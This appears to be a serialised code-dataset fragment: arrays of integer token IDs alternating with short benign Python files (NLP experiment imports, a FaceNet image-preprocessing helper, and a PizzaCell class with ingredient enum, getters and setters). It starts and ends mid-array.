7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
22,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
22,
13,
11134,
6,
532,
11299,
62,
6551,
1315,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
21,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
4570,
405,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
17620,
62,
1050,
46493,
13,
79,
400,
6,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
22,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
2,
30719,
532,
4019,
10744,
10,
767,
2167,
87,
22,
2167,
2939,
357,
4360,
5640,
13020,
287,
6228,
9568,
3006,
8,
198,
2,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
22,
6,
532,
7635,
62,
6551,
20007,
532,
7635,
62,
9888,
657,
13,
20,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
22,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
22,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
657,
532,
9060,
62,
7857,
767,
2167,
532,
22510,
62,
2676,
602,
838,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
35073,
62,
320,
11286,
316,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
7635,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
32,
23,
12,
37,
17961,
12,
22,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
198,
2,
45537,
2,
198,
2,
3563,
56,
2538,
807,
1303,
198,
2,
45537,
2,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
23,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
23,
13,
11134,
6,
532,
15003,
4738,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
22243,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
16,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
220,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
23,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
23,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
16,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
46720,
532,
22510,
62,
2676,
602,
10053,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
48466,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
17,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
23,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
23,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
17,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
28119,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
18,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
23,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
23,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
18,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
19,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
23,
6,
532,
7635,
62,
6551,
807,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
23,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
19,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
20,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
23,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
23,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
20,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
21431,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
21,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
23,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
23,
13,
11134,
6,
532,
11299,
62,
6551,
1315,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
23,
32,
21,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
4570,
405,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
17620,
62,
1050,
46493,
13,
79,
400,
6,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
23,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
2,
30719,
532,
4019,
10744,
10,
767,
2167,
87,
22,
2167,
2939,
357,
4360,
5640,
13020,
287,
6228,
9568,
3006,
8,
198,
2,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
23,
6,
532,
7635,
62,
6551,
20007,
532,
7635,
62,
9888,
657,
13,
20,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
23,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
23,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
657,
532,
9060,
62,
7857,
767,
2167,
532,
22510,
62,
2676,
602,
838,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
35073,
62,
320,
11286,
316,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
7635,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
32,
23,
12,
37,
17961,
12,
23,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471
] | 2.434266 | 18,438 |
import logging
from os import path
from os.path import dirname, join
from arekit.common.utils import create_dir_if_not_exists
from arekit.contrib.experiments.cv.default import SimpleCVFolding
from arekit.contrib.experiments.cv.doc_stat.rusentrel import RuSentRelDocStatGenerator
from arekit.contrib.experiments.cv.sentence_based import SentenceBasedCVFolding
from arekit.contrib.experiments.data_io import DataIO
from arekit.contrib.experiments.neutral.annot.rusentrel_three_scale import RuSentRelThreeScaleNeutralAnnotator
from arekit.contrib.experiments.neutral.annot.rusentrel_two_scale import RuSentRelTwoScaleNeutralAnnotator
from arekit.processing.lemmatization.mystem import MystemWrapper
from arekit.source.embeddings.rusvectores import RusvectoresEmbedding
from arekit.source.rusentrel.opinions.formatter import RuSentRelOpinionCollectionFormatter
from arekit.source.rusentrel.synonyms import RuSentRelSynonymsCollection
logger = logging.getLogger(__name__)
| [
11748,
18931,
198,
6738,
28686,
1330,
3108,
198,
6738,
28686,
13,
6978,
1330,
26672,
3672,
11,
4654,
198,
6738,
389,
15813,
13,
11321,
13,
26791,
1330,
2251,
62,
15908,
62,
361,
62,
1662,
62,
1069,
1023,
198,
6738,
389,
15813,
13,
3642,
822,
13,
23100,
6800,
13,
33967,
13,
12286,
1330,
17427,
33538,
37,
33266,
198,
6738,
389,
15813,
13,
3642,
822,
13,
23100,
6800,
13,
33967,
13,
15390,
62,
14269,
13,
14932,
298,
2411,
1330,
11667,
31837,
6892,
23579,
17126,
8645,
1352,
198,
6738,
389,
15813,
13,
3642,
822,
13,
23100,
6800,
13,
33967,
13,
34086,
594,
62,
3106,
1330,
11352,
594,
15001,
33538,
37,
33266,
198,
6738,
389,
15813,
13,
3642,
822,
13,
23100,
6800,
13,
7890,
62,
952,
1330,
6060,
9399,
198,
6738,
389,
15813,
13,
3642,
822,
13,
23100,
6800,
13,
29797,
13,
34574,
13,
14932,
298,
2411,
62,
15542,
62,
9888,
1330,
11667,
31837,
6892,
12510,
29990,
8199,
6815,
2025,
1662,
1352,
198,
6738,
389,
15813,
13,
3642,
822,
13,
23100,
6800,
13,
29797,
13,
34574,
13,
14932,
298,
2411,
62,
11545,
62,
9888,
1330,
11667,
31837,
6892,
7571,
29990,
8199,
6815,
2025,
1662,
1352,
198,
6738,
389,
15813,
13,
36948,
13,
293,
3020,
265,
1634,
13,
1820,
927,
1330,
2011,
927,
36918,
2848,
198,
6738,
389,
15813,
13,
10459,
13,
20521,
67,
654,
13,
14932,
303,
310,
2850,
1330,
9223,
303,
310,
2850,
31567,
6048,
278,
198,
6738,
389,
15813,
13,
10459,
13,
14932,
298,
2411,
13,
404,
259,
507,
13,
687,
1436,
1330,
11667,
31837,
6892,
46,
11635,
295,
36307,
8479,
1436,
198,
6738,
389,
15813,
13,
10459,
13,
14932,
298,
2411,
13,
28869,
43612,
1330,
11667,
31837,
6892,
29934,
43612,
36307,
198,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
628
] | 3.284746 | 295 |
import numpy as np
from scipy.misc import imread, imresize
FACENET_MEAN = np.array([ 0.52591038, 0.40204082, 0.34178183], dtype=np.float32)
FACENET_STD = np.sqrt(np.array([3941.30175781, 2856.94287109, 2519.35791016], dtype=np.float32) / 255.**2)
def preprocess_image(img):
"""Preprocess an image for squeezenet.
Subtracts the pixel mean and divides by the standard deviation.
"""
return (img.astype(np.float32)/255.0 - FACENET_MEAN) / FACENET_STD
| [
11748,
299,
32152,
355,
45941,
198,
6738,
629,
541,
88,
13,
44374,
1330,
545,
961,
11,
545,
411,
1096,
198,
198,
37,
2246,
1677,
2767,
62,
11682,
1565,
796,
45941,
13,
18747,
26933,
657,
13,
20,
25191,
940,
2548,
11,
220,
657,
13,
1821,
1238,
1821,
6469,
11,
220,
657,
13,
2682,
23188,
24839,
4357,
288,
4906,
28,
37659,
13,
22468,
2624,
8,
198,
37,
2246,
1677,
2767,
62,
32147,
796,
45941,
13,
31166,
17034,
7,
37659,
13,
18747,
26933,
2670,
3901,
13,
18938,
2425,
49703,
11,
2579,
3980,
13,
5824,
27800,
14454,
11,
1679,
1129,
13,
2327,
3720,
27956,
4357,
288,
4906,
28,
37659,
13,
22468,
2624,
8,
1220,
14280,
13,
1174,
17,
8,
198,
198,
4299,
662,
14681,
62,
9060,
7,
9600,
2599,
198,
220,
220,
220,
37227,
6719,
14681,
281,
2939,
329,
13170,
4801,
316,
13,
198,
220,
220,
220,
220,
198,
220,
220,
220,
3834,
83,
974,
82,
262,
17465,
1612,
290,
36319,
416,
262,
3210,
28833,
13,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1441,
357,
9600,
13,
459,
2981,
7,
37659,
13,
22468,
2624,
20679,
13381,
13,
15,
532,
44216,
1677,
2767,
62,
11682,
1565,
8,
1220,
44216,
1677,
2767,
62,
32147,
198
] | 2.353234 | 201 |
# -*- coding: utf-8 -*-
"""PizzaCell class."""
from enum import Enum, unique
from cell import Cell
from slice import Slice
@unique
class Ingredient(Enum):
"""Ingredient enum."""
MUSHROOM = 'M'
TOMATO = 'T'
class PizzaCell(object):
"""Cell of Pizza.
:type ingredient: Ingredient or None
:type top: PizzaCell or None
:type bottom: PizzaCell or None
:type right: PizzaCell or None
:type left: PizzaCell or None
:type _cell: Cell or None
:type _slice: Slice or None
:type _has_mushroom: bool
"""
ingredient = None
top = None
bottom = None
right = None
left = None
_slice = None
_cell = None
_has_mushroom = False
def __init__(self, ingredient: str):
"""PizzaCell constructor.
:param ingredient: ingredient in the cell
:type ingredient: str
"""
try:
ingredient = ingredient.upper()
except AttributeError:
raise ValueError
if ingredient == Ingredient.MUSHROOM.value:
self.ingredient = Ingredient.MUSHROOM
self._has_mushroom = True
elif ingredient == Ingredient.TOMATO.value:
self.ingredient = Ingredient.TOMATO
else:
raise ValueError
@property
def cell(self) -> Cell:
"""Cell getter.
:return: cell
:rtype: Cell
"""
return self._cell
@cell.setter
def cell(self, cell: Cell) -> None:
"""Cell setter.
:param cell: cell
:type cell: Cell
:return:
:rtype: None
"""
self._cell = cell
@property
def slice(self) -> Slice:
"""Slice getter.
:return: slice
:rtype: Slice
"""
return self._slice
@slice.setter
def slice(self, slice: Slice) -> None:
"""Slice setter.
:param slice: slice
:type slice: Slice
:return:
:rtype: None
"""
self._slice = slice
@property
def mushroom(self) -> bool:
"""This cell has mushroom.
:return: if mushroom
:rtype: bool
"""
return self._has_mushroom
@property
def tomato(self) -> bool:
"""This cell has tomato.
:return: if mushroom
:rtype: bool
"""
return not self._has_mushroom
@property
def x(self) -> int:
"""Return X of this cell.
:return: x
:rtype: int
"""
return self._cell.x
@property
def y(self) -> int:
"""Return Y of this cell.
:return: y
:rtype: int
"""
return self._cell.y
@property
def id(self) -> int:
"""Return id of this cell.
:return: id
:rtype: int
"""
return self._cell.id
def set_neighbour(self, direction: str, next_pizza_cell) -> None:
"""Look at next cell.
:param direction: direction of the next cell
:param next_pizza_cell: next PizzaCell
:param direction: str
:type next_pizza_cell: PizzaCell
:return:
:rtype: None
"""
setattr(self, direction, next_pizza_cell)
def is_equal(self, cell) -> bool:
"""Check if cell is equal.
:param cell: different PizzaCell
:type cell: PizzaCell
:return:
:rtype: bool
"""
return self.ingredient == cell.ingredient
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
47,
9990,
28780,
1398,
526,
15931,
198,
198,
6738,
33829,
1330,
2039,
388,
11,
3748,
198,
198,
6738,
2685,
1330,
12440,
198,
6738,
16416,
1330,
3454,
501,
628,
198,
31,
34642,
198,
4871,
17589,
445,
1153,
7,
4834,
388,
2599,
198,
220,
220,
220,
37227,
27682,
445,
1153,
33829,
526,
15931,
198,
220,
220,
220,
220,
198,
220,
220,
220,
337,
27143,
13252,
2662,
796,
705,
44,
6,
198,
220,
220,
220,
41526,
1404,
46,
796,
705,
51,
6,
628,
198,
4871,
20952,
28780,
7,
15252,
2599,
198,
220,
220,
220,
37227,
28780,
286,
20952,
13,
628,
220,
220,
220,
1058,
4906,
18734,
25,
17589,
445,
1153,
393,
6045,
198,
220,
220,
220,
1058,
4906,
1353,
25,
20952,
28780,
393,
6045,
198,
220,
220,
220,
1058,
4906,
4220,
25,
20952,
28780,
393,
6045,
198,
220,
220,
220,
1058,
4906,
826,
25,
20952,
28780,
393,
6045,
198,
220,
220,
220,
1058,
4906,
1364,
25,
20952,
28780,
393,
6045,
198,
220,
220,
220,
1058,
4906,
4808,
3846,
25,
12440,
393,
6045,
198,
220,
220,
220,
1058,
4906,
4808,
48369,
25,
3454,
501,
393,
6045,
198,
220,
220,
220,
1058,
4906,
4808,
10134,
62,
76,
1530,
3823,
25,
20512,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
18734,
796,
6045,
628,
220,
220,
220,
1353,
796,
6045,
198,
220,
220,
220,
4220,
796,
6045,
198,
220,
220,
220,
826,
796,
6045,
198,
220,
220,
220,
1364,
796,
6045,
628,
220,
220,
220,
4808,
48369,
796,
6045,
198,
220,
220,
220,
4808,
3846,
796,
6045,
628,
220,
220,
220,
4808,
10134,
62,
76,
1530,
3823,
796,
10352,
628,
220,
220,
220,
825,
11593,
15003,
834,
7,
944,
11,
18734,
25,
965,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
47,
9990,
28780,
23772,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
18734,
25,
18734,
287,
262,
2685,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
18734,
25,
965,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
18734,
796,
18734,
13,
45828,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
2845,
3460,
4163,
12331,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
11052,
12331,
628,
220,
220,
220,
220,
220,
220,
220,
611,
18734,
6624,
17589,
445,
1153,
13,
44,
27143,
13252,
2662,
13,
8367,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
278,
445,
1153,
796,
17589,
445,
1153,
13,
44,
27143,
13252,
2662,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
10134,
62,
76,
1530,
3823,
796,
6407,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
18734,
6624,
17589,
445,
1153,
13,
51,
2662,
1404,
46,
13,
8367,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
278,
445,
1153,
796,
17589,
445,
1153,
13,
51,
2662,
1404,
46,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
11052,
12331,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
2685,
7,
944,
8,
4613,
12440,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
28780,
651,
353,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
2685,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
12440,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13557,
3846,
628,
220,
220,
220,
2488,
3846,
13,
2617,
353,
198,
220,
220,
220,
825,
2685,
7,
944,
11,
2685,
25,
12440,
8,
4613,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
28780,
900,
353,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
2685,
25,
2685,
198,
220,
220,
220,
220,
